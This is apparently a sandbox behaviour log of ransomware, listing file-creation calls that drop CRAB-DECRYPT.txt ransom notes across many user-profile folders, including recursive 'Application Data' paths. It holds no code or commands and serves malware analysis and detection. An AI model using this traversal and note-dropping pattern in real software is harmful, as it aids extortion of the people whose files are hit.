Create C:\Documents and Settings\Default\Application Data\Microsoft\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default\Application Data\Microsoft\Internet Explorer\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default\Application Data\Microsoft\Internet Explorer\Quick Launch\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default\Cookies\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\Default\Desktop\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\Default\Documents\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\Default\Documents\My Music\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\Default\Documents\My Pictures\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\Default\Documents\My Videos\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\Default\Downloads\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\Default\Favorites\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\Default\Links\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\Default\Music\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default\My Documents\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default\My Documents\My Music\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default\My Documents\My Pictures\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default\My Documents\My Videos\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default\NetHood\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\Default\NTUSER.DAT.LOG1 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Documents and Settings\Default\NTUSER.DAT.LOG2 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Documents and Settings\Default\NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TM.blf desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Documents and Settings\Default\NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TMContainer00000000000000000001.regtrans-ms desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Documents and Settings\Default\NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TMContainer00000000000000000002.regtrans-ms desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Documents and Settings\Default\Pictures\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default\PrintHood\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\Default\Recent\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\Default\Saved Games\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\Default\SendTo\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\Default\Start Menu\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\Default\Start Menu\Programs\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\Default\Start Menu\Programs\Accessibility\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\Default\Start Menu\Programs\Accessories\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\Default\Start Menu\Programs\Maintenance\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\Default\Start Menu\Programs\System Tools\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\Default\Start Menu\Programs\Windows PowerShell\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\Default\Templates\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\Default\Videos\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\AppData\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\AppData\Local\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\History\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temporary Internet Files\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\History\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\InputPersonalization\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Sidebar\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temporary Internet Files\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\History\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\InputPersonalization\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\InputPersonalization\TrainedDataStore\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Sidebar\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Sidebar\Gadgets\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temporary Internet Files\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\History\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\InputPersonalization\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\InputPersonalization\TrainedDataStore\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Sidebar\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Sidebar\Gadgets\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temporary Internet Files\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\History\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\InputPersonalization\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\InputPersonalization\TrainedDataStore\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Sidebar\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Sidebar\Gadgets\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temporary Internet Files\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\History\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\InputPersonalization\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\InputPersonalization\TrainedDataStore\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Sidebar\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Sidebar\Gadgets\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temporary Internet Files\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\History\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\InputPersonalization\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\InputPersonalization\TrainedDataStore\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Sidebar\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Sidebar\Gadgets\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temporary Internet Files\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\History\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\InputPersonalization\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\InputPersonalization\TrainedDataStore\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Sidebar\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Sidebar\Gadgets\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Temporary Internet Files\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\History\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Microsoft\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Microsoft\InputPersonalization\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Microsoft\InputPersonalization\TrainedDataStore\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Sidebar\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Sidebar\Gadgets\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Temp\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Application Data\Temporary Internet Files\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\History\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Microsoft\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Microsoft\InputPersonalization\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Microsoft\InputPersonalization\TrainedDataStore\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Default User\AppData\Local\Application Data\Application Data\Application Data\Microsoft\Windows Sidebar\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
